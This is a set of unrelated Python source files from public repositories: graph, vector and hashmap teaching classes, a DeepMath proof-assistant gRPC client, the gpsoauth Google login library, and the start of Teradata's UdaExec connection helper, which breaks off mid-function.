return -1, key, default
def get(aMap, key, default=None):
"""Gets the value in a bucket for the given key, or the default."""
i, k, v = get_slot(aMap, key, default=default)
return v
def set(aMap, key, value):
"""Sets the key to the value, replacing any existing value."""
bucket = get_bucket(aMap, key)
i, k, v = get_slot(aMap, key)
if i >= 0:
# the key exists, replace it
bucket[i] = (key, value)
else:
# the key does not, append to create it
bucket.append((key, value))
def delete(aMap, key):
"""Deletes the given key from the Map."""
bucket = get_bucket(aMap, key)
for i in xrange(len(bucket)):
k, v = bucket[i]
if key == k:
del bucket[i]
break
def list(aMap):
"""Prints out what's in the Map."""
for bucket in aMap:
if bucket:
for k, v in bucket:
print k, v
| {
"repo_name": "jessehagberg/python-playground",
"path": "hashmap.py",
"copies": "1",
"size": "2724",
"license": "cc0-1.0",
"hash": 904727997097923800,
"line_mean": 29.3333333333,
"line_max": 105,
"alpha_frac": 0.6600587372,
"autogenerated": false,
"ratio": 3.2819277108433735,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.44419864480433735,
"avg_score": null,
"num_lines": null
} |
""" A Python Class
A simple Python graph class, demonstrating the essential
facts and functionalities of graphs.
"""
class Graph(object):
def __init__(self, graph_dict={}):
""" initializes a graph object """
self.__graph_dict = graph_dict
def vertices(self):
""" returns the vertices of a graph """
return list(self.__graph_dict.keys())
def edges(self):
""" returns the edges of a graph """
return self.__generate_edges()
def add_vertex(self, vertex):
""" If the vertex "vertex" is not in
self.__graph_dict, a key "vertex" with an empty
list as a value is added to the dictionary.
Otherwise nothing has to be done.
"""
if vertex not in self.__graph_dict:
self.__graph_dict[vertex] = []
def add_edge(self, edge):
""" assumes that edge is of type set, tuple or list;
between two vertices can be multiple edges!
"""
edge = set(edge)
vertex1 = edge.pop()
if edge:
# not a loop
vertex2 = edge.pop()
else:
# a loop
vertex2 = vertex1
if vertex1 in self.__graph_dict:
self.__graph_dict[vertex1].append(vertex2)
else:
self.__graph_dict[vertex1] = [vertex2]
def __generate_edges(self):
""" A static method generating the edges of the
graph "graph". Edges are represented as sets
with one (a loop back to the vertex) or two
vertices
"""
edges = []
for vertex in self.__graph_dict:
for neighbour in self.__graph_dict[vertex]:
if {neighbour, vertex} not in edges:
edges.append({vertex, neighbour})
return edges
def __str__(self):
res = "vertices: "
for k in self.__graph_dict:
res += str(k) + " "
res += "\nedges: "
for edge in self.__generate_edges():
res += str(edge) + " "
return res
def find_isolated_vertices(self):
""" returns a list of isolated vertices. """
graph = self.__graph_dict
isolated = []
for vertex in graph:
print(isolated, vertex)
if not graph[vertex]:
isolated += [vertex]
return isolated
def find_path(self, start_vertex, end_vertex, path=[]):
""" find a path from start_vertex to end_vertex
in graph """
graph = self.__graph_dict
path = path + [start_vertex]
if start_vertex == end_vertex:
return path
if start_vertex not in graph:
return None
for vertex in graph[start_vertex]:
if vertex not in path:
extended_path = self.find_path(vertex,
end_vertex,
path)
if extended_path:
return extended_path
return None
def find_all_paths(self, start_vertex, end_vertex, path=[]):
""" find all paths from start_vertex to
end_vertex in graph """
graph = self.__graph_dict
path = path + [start_vertex]
if start_vertex == end_vertex:
return [path]
if start_vertex not in graph:
return []
paths = []
for vertex in graph[start_vertex]:
if vertex not in path:
extended_paths = self.find_all_paths(vertex,
end_vertex,
path)
for p in extended_paths:
paths.append(p)
return paths
def is_connected(self,
vertices_encountered = set(),
start_vertex=None):
""" determines if the graph is connected """
gdict = self.__graph_dict
vertices = gdict.keys()
if not start_vertex:
# chosse a vertex from graph as a starting point
start_vertex = vertices[0]
vertices_encountered.add(start_vertex)
if len(vertices_encountered) != len(vertices):
for vertex in gdict[start_vertex]:
if vertex not in vertices_encountered:
if self.is_connected(vertices_encountered, vertex):
return True
else:
return True
return False
def vertex_degree(self, vertex):
""" The degree of a vertex is the number of edges connecting
it, i.e. the number of adjacent vertices. Loops are counted
double, i.e. every occurence of vertex in the list
of adjacent vertices. """
adj_vertices = self.__graph_dict[vertex]
degree = len(adj_vertices) + adj_vertices.count(vertex)
return degree
def degree_sequence(self):
""" calculates the degree sequence """
seq = []
for vertex in self.__graph_dict:
seq.append(self.vertex_degree(vertex))
seq.sort(reverse=True)
return tuple(seq)
@staticmethod
def is_degree_sequence(sequence):
""" Method returns True, if the sequence "sequence" is a
degree sequence, i.e. a non-increasing sequence.
Otherwise False is returned.
"""
# check if the sequence sequence is non-increasing:
return all( x>=y for x, y in zip(sequence, sequence[1:]))
def delta(self):
""" the minimum degree of the vertices """
min = 100000000
for vertex in self.__graph_dict:
vertex_degree = self.vertex_degree(vertex)
if vertex_degree < min:
min = vertex_degree
return min
def Delta(self):
""" the maximum degree of the vertices """
max = 0
for vertex in self.__graph_dict:
vertex_degree = self.vertex_degree(vertex)
if vertex_degree > max:
max = vertex_degree
return max
def density(self):
""" method to calculate the density of a graph """
g = self.__graph_dict
V = len(g.keys())
E = len(self.edges())
return 2.0 * E / (V *(V - 1))
def diameter(self):
""" calculates the diameter of the graph """
v = self.vertices()
pairs = [ (v[i],v[j]) for i in range(len(v)) for j in range(i+1, len(v)-1)]
smallest_paths = []
for (s,e) in pairs:
paths = self.find_all_paths(s,e)
smallest = sorted(paths, key=len)[0]
smallest_paths.append(smallest)
smallest_paths.sort(key=len)
# longest path is at the end of list,
# i.e. diameter corresponds to the length of this path
diameter = len(smallest_paths[-1])
return diameter
@staticmethod
def erdoes_gallai(dsequence):
""" Checks if the condition of the Erdoes-Gallai inequality
is fullfilled
"""
if sum(dsequence) % 2:
# sum of sequence is odd
return False
if Graph.is_degree_sequence(dsequence):
for k in range(1,len(dsequence) + 1):
left = sum(dsequence[:k])
right = k * (k-1) + sum([min(x,k) for x in dsequence[k:]])
if left > right:
return False
else:
# sequence is increasing
return False
return True
if __name__ == "__main__":
g = { "a" : ["d"],
"b" : ["c"],
"c" : ["b", "c", "d", "e"],
"d" : ["a", "c"],
"e" : ["c"],
"f" : []
}
graph = Graph(g)
print(graph)
for node in graph.vertices():
print(graph.vertex_degree(node))
print("List of isolated vertices:")
print(graph.find_isolated_vertices())
print("""A path from "a" to "e":""")
print(graph.find_path("a", "e"))
print("""All pathes from "a" to "e":""")
print(graph.find_all_paths("a", "e"))
print("The maximum degree of the graph is:")
print(graph.Delta())
print("The minimum degree of the graph is:")
print(graph.delta())
print("Edges:")
print(graph.edges())
print("Degree Sequence: ")
ds = graph.degree_sequence()
print(ds)
fullfilling = [ [2, 2, 2, 2, 1, 1],
[3, 3, 3, 3, 3, 3],
[3, 3, 2, 1, 1]
]
non_fullfilling = [ [4, 3, 2, 2, 2, 1, 1],
[6, 6, 5, 4, 4, 2, 1],
[3, 3, 3, 1] ]
for sequence in fullfilling + non_fullfilling :
print(sequence, Graph.erdoes_gallai(sequence))
print("Add vertex 'z':")
graph.add_vertex("z")
print(graph)
print("Add edge ('x','y'): ")
graph.add_edge(('x', 'y'))
print(graph)
print("Add edge ('a','d'): ")
graph.add_edge(('a', 'd'))
print(graph)
| {
"repo_name": "ivannz/study_notes",
"path": "year_14_15/fall_2014/programming/graph2.py",
"copies": "1",
"size": "9074",
"license": "mit",
"hash": -5428572147049922000,
"line_mean": 30.6167247387,
"line_max": 83,
"alpha_frac": 0.5076041437,
"autogenerated": false,
"ratio": 4.164295548416705,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5171899692116705,
"avg_score": null,
"num_lines": null
} |
""" A python class to represent vectors """
import math
class Vector(object):
def __init__(self, coordinates, tolerance=1e-10):
self.coordinates = tuple(coordinates)
self.dimension = len(coordinates)
self.tolerance = tolerance
def __str__(self):
return "{}".format(self.coordinates)
def __eq__(self, v):
return self.coordinates == v.coordinates
def __add__(self, v):
if self.dimension != v.dimension:
raise ValueError("Vector dimensions must be the same")
newCoords = []
for i in range(self.dimension):
newCoords.append(self.coordinates[i] + v.coordinates[i])
return Vector(newCoords)
def __sub__(self, v):
if self.dimension != v.dimension:
raise ValueError("Vector dimensions must be the same")
newCoords = []
for i in range(self.dimension):
newCoords.append(self.coordinates[i] - v.coordinates[i])
return Vector(newCoords)
def __mul__(self, other):
if type(other) is Vector:
selfMag = self.getMagnitude()
otherMag = other.getMagnitude()
allOfProducts = [x*y for x,y in zip(self.coordinates, other.coordinates)]
return sum(allOfProducts)
else:
newCoords = []
for i in range(self.dimension):
newCoords.append(self.coordinates[i] * other)
return Vector(newCoords)
def getMagnitude(self):
""" Returns the magnitude (length) of the given Vector """
coordinatesSquared = [x**2 for x in self.coordinates]
return math.sqrt(sum(coordinatesSquared))
def getNormalization(self):
""" Returns the unit vector representation of the given Vector """
selfMag = self.getMagnitude()
try:
return self * ((1/selfMag))
except ZeroDivisionError:
raise exception("Cannot normalize the zero vector")
def isZero(self):
return self.getMagnitude() < self.tolerance
def angleDiff(self, other, units="rad"):
""" Returns the angle between two vectors """
rads = math.acos((self * other) / (self.getMagnitude() * other.getMagnitude()))
if units == "rad":
return rads
else:
return math.degrees(rads)
def orthogonalTo(self, other):
""" Returns true of the vectors are orthogonal to each other """
return abs(self * other) < self.tolerance
def parallelTo(self, other):
""" Returns true if the vectors are parallel to each other """
return (self.isZero() or other.isZero() or
self.angleDiff(other, "deg") == 0 or
self.angleDiff(other, "deg") == 180)
if __name__ == "__main__":
myVec1 = Vector([1,2,3])
myVec2 = Vector([-2,0,5])
print("Vec1 {}".format(myVec1))
print("Vec2 {}".format(myVec2))
print("Vec1 + Vec2 = {}".format(myVec1 + myVec2))
print("Vec1 - Vec2 = {}".format(myVec1 - myVec2))
print("Vec1 * 2 = {}".format(myVec1 * 2))
print("Vec1 * Vec2 = {}".format(myVec1 * myVec2))
print("Vec1 Magnitude = {}".format(myVec1.getMagnitude()))
print("Vec2 Normalized = {}".format(myVec2.getNormalization()))
| {
"repo_name": "certifiedloud/linalg",
"path": "stumpy.py",
"copies": "1",
"size": "3259",
"license": "mit",
"hash": 1164223916371088000,
"line_mean": 35.2111111111,
"line_max": 87,
"alpha_frac": 0.5900583001,
"autogenerated": false,
"ratio": 3.9217809867629363,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9996744471432871,
"avg_score": 0.0030189630860128947,
"num_lines": 90
} |
"""A python client interface for ProofAssistantService."""
from __future__ import absolute_import
from __future__ import division
# Import Type Annotations
from __future__ import print_function
import grpc
import tensorflow as tf
from deepmath.proof_assistant import proof_assistant_pb2
from deepmath.proof_assistant import proof_assistant_pb2_grpc
tf.flags.DEFINE_string(
'proof_assistant_server_address', 'localhost:2000',
'address (including port) of the proof assistant server')
FLAGS = tf.flags.FLAGS
GIGABYTE = 1024 * 1024 * 1024
GRPC_MAX_MESSAGE_LENGTH = GIGABYTE
class ProofAssistant(object):
"""Class for intefacing a proof assistant."""
def __init__(self):
self.channel = grpc.insecure_channel(
FLAGS.proof_assistant_server_address,
options=[('grpc.max_send_message_length', GRPC_MAX_MESSAGE_LENGTH),
('grpc.max_receive_message_length', GRPC_MAX_MESSAGE_LENGTH)])
self.stub = proof_assistant_pb2_grpc.ProofAssistantServiceStub(self.channel)
def ApplyTactic(self, request: proof_assistant_pb2.ApplyTacticRequest
) -> proof_assistant_pb2.ApplyTacticResponse:
return self.stub.ApplyTactic(request)
def VerifyProof(self, request: proof_assistant_pb2.VerifyProofRequest
) -> proof_assistant_pb2.VerifyProofResponse:
return self.stub.VerifyProof(request)
def RegisterTheorem(self, request: proof_assistant_pb2.RegisterTheoremRequest
) -> proof_assistant_pb2.RegisterTheoremResponse:
return self.stub.RegisterTheorem(request)
| {
"repo_name": "tensorflow/deepmath",
"path": "deepmath/deephol/public/proof_assistant.py",
"copies": "1",
"size": "1565",
"license": "apache-2.0",
"hash": -7398573641677141000,
"line_mean": 36.2619047619,
"line_max": 80,
"alpha_frac": 0.731629393,
"autogenerated": false,
"ratio": 3.5568181818181817,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9768835446917433,
"avg_score": 0.003922425580149703,
"num_lines": 42
} |
"""A python client library for Google Play Services OAuth."""
from __future__ import annotations
from collections.abc import MutableMapping
from importlib.metadata import version
import ssl
from typing import Any, Iterable
import requests
from urllib3.poolmanager import PoolManager # type: ignore
from . import google
__version__ = version(__package__)
# The key is distirbuted with Google Play Services.
# This one is from version 7.3.29.
B64_KEY_7_3_29 = (
b"AAAAgMom/1a/v0lblO2Ubrt60J2gcuXSljGFQXgcyZWveWLEwo6prwgi3"
b"iJIZdodyhKZQrNWp5nKJ3srRXcUW+F1BD3baEVGcmEgqaLZUNBjm057pK"
b"RI16kB0YppeGx5qIQ5QjKzsR8ETQbKLNWgRY0QRNVz34kMJR3P/LgHax/"
b"6rmf5AAAAAwEAAQ=="
)
ANDROID_KEY_7_3_29 = google.key_from_b64(B64_KEY_7_3_29)
AUTH_URL = "https://android.clients.google.com/auth"
USER_AGENT = "gpsoauth/" + __version__
# Google is very picky about list of used ciphers. Changing this list most likely
# will cause BadAuthentication error.
CIPHERS = [
"ECDHE+AESGCM",
"ECDHE+CHACHA20",
"DHE+AESGCM",
"DHE+CHACHA20",
"ECDH+AES",
"DH+AES",
"RSA+AESGCM",
"RSA+AES",
"!aNULL",
"!eNULL",
"!MD5",
"!DSS",
]
class SSLContext(ssl.SSLContext):
"""SSLContext wrapper."""
def set_alpn_protocols(self, alpn_protocols: Iterable[str]) -> None:
"""
ALPN headers cause Google to return 403 Bad Authentication.
"""
class AuthHTTPAdapter(requests.adapters.HTTPAdapter):
"""HTTPAdapter wrapper."""
def init_poolmanager(self, *args: Any, **kwargs: Any) -> None:
"""
Secure settings from ssl.create_default_context(), but without
ssl.OP_NO_TICKET which causes Google to return 403 Bad
Authentication.
"""
context = SSLContext()
context.set_ciphers(":".join(CIPHERS))
context.options |= ssl.OP_NO_COMPRESSION
context.options |= ssl.OP_NO_SSLv2
context.options |= ssl.OP_NO_SSLv3
context.post_handshake_auth = True
context.verify_mode = ssl.CERT_REQUIRED
self.poolmanager = PoolManager(*args, ssl_context=context, **kwargs)
def _perform_auth_request(
data: dict[str, int | str | bytes], proxies: MutableMapping[str, str] | None = None
) -> dict[str, str]:
session = requests.session()
session.mount(AUTH_URL, AuthHTTPAdapter())
if proxies:
session.proxies = proxies
res = session.post(AUTH_URL, data, headers={"User-Agent": USER_AGENT})
return google.parse_auth_response(res.text)
def perform_master_login(
email: str,
password: str,
android_id: str,
service: str = "ac2dm",
device_country: str = "us",
operator_country: str = "us",
lang: str = "en",
sdk_version: int = 17,
proxy: MutableMapping[str, str] | None = None,
) -> dict[str, str]:
"""
Perform a master login, which is what Android does when you first add
a Google account.
Return a dict, eg::
{
'Auth': '...',
'Email': 'email@gmail.com',
'GooglePlusUpgrade': '1',
'LSID': '...',
'PicasaUser': 'My Name',
'RopRevision': '1',
'RopText': ' ',
'SID': '...',
'Token': 'oauth2rt_1/...',
'firstName': 'My',
'lastName': 'Name',
'services': 'hist,mail,googleme,...'
}
"""
data: dict[str, int | str | bytes] = {
"accountType": "HOSTED_OR_GOOGLE",
"Email": email,
"has_permission": 1,
"add_account": 1,
"EncryptedPasswd": google.construct_signature(
email, password, ANDROID_KEY_7_3_29
),
"service": service,
"source": "android",
"androidId": android_id,
"device_country": device_country,
"operatorCountry": operator_country,
"lang": lang,
"sdk_version": sdk_version,
}
return _perform_auth_request(data, proxy)
def perform_oauth(
email: str,
master_token: str,
android_id: str,
service: str,
app: str,
client_sig: str,
device_country: str = "us",
operator_country: str = "us",
lang: str = "en",
sdk_version: int = 17,
proxy: MutableMapping[str, str] | None = None,
) -> dict[str, str]:
"""
Use a master token from master_login to perform OAuth to a specific Google service.
Return a dict, eg::
{
'Auth': '...',
'LSID': '...',
'SID': '..',
'issueAdvice': 'auto',
'services': 'hist,mail,googleme,...'
}
To authenticate requests to this service, include a header
``Authorization: GoogleLogin auth=res['Auth']``.
"""
data: dict[str, int | str | bytes] = {
"accountType": "HOSTED_OR_GOOGLE",
"Email": email,
"has_permission": 1,
"EncryptedPasswd": master_token,
"service": service,
"source": "android",
"androidId": android_id,
"app": app,
"client_sig": client_sig,
"device_country": device_country,
"operatorCountry": operator_country,
"lang": lang,
"sdk_version": sdk_version,
}
return _perform_auth_request(data, proxy)
| {
"repo_name": "simon-weber/gpsoauth",
"path": "gpsoauth/__init__.py",
"copies": "1",
"size": "5217",
"license": "mit",
"hash": -7823423472072371000,
"line_mean": 26.75,
"line_max": 87,
"alpha_frac": 0.5915276979,
"autogenerated": false,
"ratio": 3.416502946954813,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4508030644854813,
"avg_score": null,
"num_lines": null
} |
""" A Python Database API Specification v2.0 implementation that provides
configuration loading, variable substitution, logging, query banding,
etc and options to use either ODBC or REST"""
# The MIT License (MIT)
#
# Copyright (c) 2015 by Teradata
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import string
import os.path
import logging
import time
import atexit
import datetime
import platform
import getpass
import subprocess
import collections
import codecs
from .util import toUnicode
from . import tdodbc, util, api, datatypes
from . import tdrest # @UnresolvedImport
from .version import __version__ # @UnresolvedImport
# The module logger
logger = logging.getLogger(__name__)
METHOD_REST = "rest"
METHOD_ODBC = "odbc"
# Implement python version specific setup.
if sys.version_info[0] == 2:
import ConfigParser as configparser # @UnresolvedImport #@UnusedImport
else:
import configparser # @UnresolvedImport @UnusedImport @Reimport
def handleUncaughtException(exc_type, exc_value, exc_traceback):
"""Make sure that uncaught exceptions are logged"""
logger.error("Uncaught exception", exc_info=(
exc_type, exc_value, exc_traceback))
sys.__excepthook__(exc_type, exc_value, exc_traceback)
def exiting():
"""Invoked when the python interpreter is exiting."""
logger.info("UdaExec exiting.")
class UdaExec:
"""Helper class for scripting with Teradata systems"""
def __init__(self, appName="${appName}", version="${version}",
checkpointFile="${checkpointFile}",
runNumberFile="${runNumberFile}", runNumber=None,
configureLogging="${configureLogging}", logDir="${logDir}",
logFile="${logFile}", logConsole="${logConsole}",
logLevel="${logLevel}", logRetention="${logRetention}",
systemConfigFile="/etc/udaexec.ini",
userConfigFile="~/udaexec.ini", appConfigFile="udaexec.ini",
configFiles=None, configSection="CONFIG",
configEncoding="utf8", parseCmdLineArgs=True,
gitPath="${gitPath}", production="${production}",
odbcLibPath="${odbcLibPath}",
dataTypeConverter=datatypes.DefaultDataTypeConverter()):
""" Initializes the UdaExec framework """
# Load configuration files.
if configFiles is None:
configFiles = []
_appendConfigFiles(
configFiles, systemConfigFile, userConfigFile, appConfigFile)
logMsgs = [(logging.INFO, "Initializing UdaExec...")]
self.config = UdaExecConfig(configFiles, configEncoding,
configSection, parseCmdLineArgs, logMsgs)
# Verify required configuration parameters are specified.
self.config['appName'] = self.config.resolve(
appName, errorMsg="appName is a required field, it must be "
"passed in as a parameter or specified in a config file.")
# Initialize runNumbers.
self._initRunNumber(runNumberFile, runNumber, logMsgs)
# Configure Logging
self.configureLogging = util.booleanValue(
self.config.resolve(configureLogging, default="True"))
if self.configureLogging:
self._initLogging(
self.config.resolve(logDir, default="logs"),
self.config.resolve(
logFile, default=self.config.resolve(
"${appName}.${runNumber}.log")),
util.booleanValue(
self.config.resolve(logConsole, default="True")),
getattr(
logging, self.config.resolve(logLevel, default="INFO")),
int(self.config.resolve(logRetention, default="90")), logMsgs)
# Log messages that were collected prior to logging being configured.
for (level, msg) in logMsgs:
logger.log(level, toUnicode(msg))
self._initVersion(self.config.resolve(
version, default=""), self.config.resolve(gitPath, default=""))
self._initQueryBands(self.config.resolve(production, default="false"))
self._initCheckpoint(checkpointFile)
self.odbcLibPath = self.config.resolve(odbcLibPath, default="")
self.dataTypeConverter = dataTypeConverter
logger.info(self)
logger.debug(self.config)
# Register exit function. d
atexit.register(exiting)
def connect(self, externalDSN=None, dataTypeConverter=None, **kwargs):
"""Creates a database connection"""
# Construct data source configuration parameters
args = {}
if externalDSN is not None:
externalDSN = self.config.resolve(externalDSN)
args = self.config.section(externalDSN)
if args is None:
raise api.InterfaceError(
api.CONFIG_ERROR,
"No data source named \"{}\".".format(externalDSN))
args.update(self.config.resolveDict(kwargs))
# Log connection details.
paramsToLog = dict(args)
paramsToLog['password'] = 'XXXXXX'
if externalDSN:
paramsToLog['externalDSN'] = externalDSN
logger.info("Creating connection: %s", paramsToLog)
# Determine connection method.
method = None
if 'method' in args:
method = args.pop('method')
util.raiseIfNone('method', method)
if 'queryBands' in args:
queryBands = args.pop('queryBands')
self.queryBands.update(queryBands)
if 'autoCommit' not in args:
args['autoCommit'] = "true"
if not dataTypeConverter:
dataTypeConverter = self.dataTypeConverter
# Create the connection
try:
start = time.time()
if method.lower() == METHOD_REST:
conn = UdaExecConnection(
self, tdrest.connect(queryBands=self.queryBands,
dataTypeConverter=dataTypeConverter,
**args))
elif method.lower() == METHOD_ODBC:
conn = UdaExecConnection(
self, tdodbc.connect(queryBands=self.queryBands,
odbcLibPath=self.odbcLibPath,
dataTypeConverter=dataTypeConverter,
**args))
else:
raise api.InterfaceError(
api.CONFIG_ERROR,
"Connection method \"{}\" not supported".format(method))
duration = time.time() - start
logger.info(
"Connection successful. Duration: %.3f seconds. Details: %s",
duration, paramsToLog)
return conn
except Exception:
logger.exception("Unable to create connection: %s", paramsToLog)
raise
def checkpoint(self, checkpointName=None):
""" Sets or clears the current checkpoint."""
if checkpointName is None:
logger.info("Clearing checkpoint....")
self.currentCheckpoint = None
self.skip = False
if self.checkpointManager:
self.checkpointManager.clearCheckpoint()
else:
self.currentCheckpoint = checkpointName
if self.skip:
if self.resumeFromCheckpoint == self.currentCheckpoint:
logger.info(
"Reached resume checkpoint: \"%s\". "
"Resuming execution...", checkpointName)
self.skip = False
else:
logger.info("Reached checkpoint: \"%s\"", checkpointName)
if self.checkpointManager:
self.checkpointManager.saveCheckpoint(checkpointName)
def setCheckpointManager(self, checkpointManager):
""" Sets a custom Checkpoint Manager. """
util.raiseIfNone("checkpointManager", checkpointManager)
logger.info("Setting custom checkpoint manager: %s", checkpointManager)
self.checkpointManager = checkpointManager
logger.info("Loading resume checkpoint from checkpoint manager...")
self.setResumeCheckpoint(checkpointManager.loadCheckpoint())
def setResumeCheckpoint(self, resumeCheckpoint):
""" Sets the checkpoint that must be hit for executes to not
be skipped."""
self.resumeFromCheckpoint = resumeCheckpoint
if resumeCheckpoint:
logger.info(
"Resume checkpoint changed to \"%s\". Skipping all calls to "
"execute until checkpoint is reached.",
self.resumeFromCheckpoint)
self.skip = True
else:
self.resumeFromCheckpoint = None
if self.skip:
self.skip = False
logger.info(
"Resume checkpoint cleared. Execute calls will "
"no longer be skipped.")
else:
logger.info(
"No resume checkpoint set, continuing execution...")
def _initLogging(self, logDir, logFile, logConsole, level, logRetention,
logMsgs):
"""Initialize UdaExec logging"""
if not os.path.exists(logDir):
os.makedirs(logDir)
self._cleanupLogs(logDir, logRetention, logMsgs)
self.logDir = os.path.realpath(logDir)
self.logFile = os.path.join(self.logDir, logFile)
formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s - %(message)s")
fh = logging.FileHandler(self.logFile, mode="a", encoding="utf8")
fh.setFormatter(formatter)
fh.setLevel(level)
sh = logging.StreamHandler(sys.stdout)
sh.setFormatter(formatter)
sh.setLevel(level)
root = logging.getLogger()
root.setLevel(level)
root.addHandler(fh)
if logConsole:
root.addHandler(sh)
sys.excepthook = handleUncaughtException
def _cleanupLogs(self, logDir, logRetention, logMsgs):
"""Cleanup older log files."""
logMsgs.append(
(logging.INFO,
"Cleaning up log files older than {} days.".format(logRetention)))
cutoff = time.time() - (logRetention * 86400)
count = 0
for f in os.listdir(logDir):
f = os.path.join(logDir, f)
if os.stat(f).st_mtime < cutoff:
logMsgs.append(
(logging.DEBUG, "Removing log file: {}".format(f)))
os.remove(f)
count += 1
logMsgs.append((logging.INFO, "Removed {} log files.".format(count)))
def _initRunNumber(self, runNumberFile, runNumber, logMsgs):
"""Initialize the run number unique to this particular execution."""
if runNumber is not None:
self.runNumber = runNumber
logMsgs.append(
(logging.INFO, "Setting run number to {}.".format(runNumber)))
else:
self.runNumber = "1"
self.runNumberFile = self.config.resolve(
runNumberFile, default='.runNumber')
self.runNumberFile = os.path.abspath(self.runNumberFile)
if os.path.isfile(self.runNumberFile):
logMsgs.append(
(logging.INFO, "Found run number "
"file: \"{}\"".format(self.runNumberFile)))
with open(self.runNumberFile, "r") as f:
self.runNumber = f.readline()
if self.runNumber is not None:
try:
self.runNumber = str(int(self.runNumber) + 1)
except:
logMsgs.append(
(logging.WARN, "Unable to increment run "
"number ({}) in {}. Resetting run number "
"to 1.".format(self.runNumber,
self.runNumberFile)))
self.runNumber = "1"
else:
logMsgs.append(
(logging.WARN, "No run number found in {}. Resetting "
"run number to 1.".format(self.runNumberFile)))
else:
logMsgs.append(
(logging.INFO, "No previous run number found as {} does "
"not exist. Initializing run number to 1".format(
self.runNumberFile)))
with open(self.runNumberFile, 'w') as f:
f.write(self.runNumber)
self.runNumber = datetime.datetime.now().strftime(
"%Y%m%d%H%M%S") + "-" + self.runNumber
self.config['runNumber'] = self.runNumber
def _initCheckpoint(self, checkpointFile):
"""Initialize the result checkpoint."""
self.currentCheckpoint = None
self.skip = False
if checkpointFile:
checkpointFile = self.config.resolve(
checkpointFile, default=self.config['appName'] +
".checkpoint")
if checkpointFile:
checkpointFile = os.path.abspath(checkpointFile)
self.checkpointManager = UdaExecCheckpointManagerFileImpl(
checkpointFile)
self.resumeFromCheckpoint = self.checkpointManager.loadCheckpoint()
if self.resumeFromCheckpoint:
logger.info(
"Resuming from checkpoint \"%s\".",
self.resumeFromCheckpoint)
self.skip = True
else:
logger.info("No previous checkpoint found, executing "
"from beginning...")
self.skip = False
else:
self.checkpointManager = None
self.resumeFromCheckpoint = None
logger.info("Checkpoint file disabled.")
def _initVersion(self, version, gitPath):
"""Initialize the version and GIT revision."""
if not gitPath:
gitPath = "git"
logger.debug("Git path not specified, using system path.")
self.gitVersion = None
self.gitRevision = None
self.gitDirty = None
try:
self.gitVersion = subprocess.check_output(
[gitPath, "--version"],
stderr=subprocess.STDOUT).decode("utf-8").strip()
self.gitRevision = subprocess.check_output(
[gitPath, "describe", "--tags", "--always", "HEAD"],
stderr=subprocess.STDOUT).decode("utf-8").strip()
self.modifiedFiles = subprocess.check_output(
[gitPath, "status", "--porcelain"],
stderr=subprocess.STDOUT).decode("utf-8").splitlines()
self.gitDirty = True if self.modifiedFiles else False
except subprocess.CalledProcessError as e:
logger.debug(
"Git information is not available: %s.",
e.output.decode("utf-8"))
except Exception as e:
logger.debug("Git is not available: %s", e)
if not version:
version = self.gitRevision
if not version:
raise api.InterfaceError(
api.CONFIG_ERROR, "version is a required field, it must be "
"passed in as a parameter, specified in a config file, "
"or pulled from a git repository.")
self.config['version'] = version
def _initQueryBands(self, production):
"""Initialize the Query Band that will be set on future connections."""
self.queryBands = collections.OrderedDict()
self.queryBands['ApplicationName'] = self.config['appName']
self.queryBands['Version'] = self.config['version']
self.queryBands['JobID'] = self.runNumber
self.queryBands['ClientUser'] = getpass.getuser()
self.queryBands['Production'] = util.booleanValue(production)
if self.configureLogging:
self.queryBands['udaAppLogFile'] = self.logFile
if self.gitRevision:
self.queryBands['gitRevision'] = self.gitRevision
if self.gitDirty is not None:
self.queryBands['gitDirty'] = self.gitDirty
self.queryBands['UtilityName'] = 'PyTd'
self.queryBands['UtilityVersion'] = __version__
def __str__(self):
value = u"Execution Details:\n/"
value += u'*' * 80
value += u"\n"
value += u" * Application Name: {}\n".format(
toUnicode(self.config['appName']))
value += u" * Version: {}\n".format(
toUnicode(self.config['version']))
value += u" * Run Number: {}\n".format(toUnicode(self.runNumber))
value += u" * Host: {}\n".format(
toUnicode(platform.node()))
value += u" * Platform: {}\n".format(
platform.platform(aliased=True))
value += u" * OS User: {}\n".format(
toUnicode(getpass.getuser()))
value += u" * Python Version: {}\n".format(platform.python_version())
value += u" * Python Compiler: {}\n".format(
platform.python_compiler())
value += u" * Python Build: {}\n".format(platform.python_build())
value += u" * UdaExec Version: {}\n".format(__version__)
value += u" * Program Name: {}\n".format(toUnicode(sys.argv[0]))
value += u" * Working Dir: {}\n".format(toUnicode(os.getcwd()))
if self.gitRevision:
value += u" * Git Version: {}\n".format(self.gitVersion)
value += u" * Git Revision: {}\n".format(self.gitRevision)
value += u" * Git Dirty: {} {}\n".format(
self.gitDirty, "" if not self.gitDirty else "[" +
",".join(self.modifiedFiles) + "]")
if self.configureLogging:
value += u" * Log Dir: {}\n".format(
toUnicode(self.logDir))
value += u" * Log File: {}\n".format(
toUnicode(self.logFile))
value += u" * Config Files: {}\n".format(
toUnicode(self.config.configFiles))
value += u" * Query Bands: {}\n".format(
u";".join(u"{}={}".format(toUnicode(k), toUnicode(v))
for k, v in self.queryBands.items()))
value += '*' * 80
value += '/'
return value
def _appendConfigFiles(configFiles, *args):
for arg in args:
if arg is None:
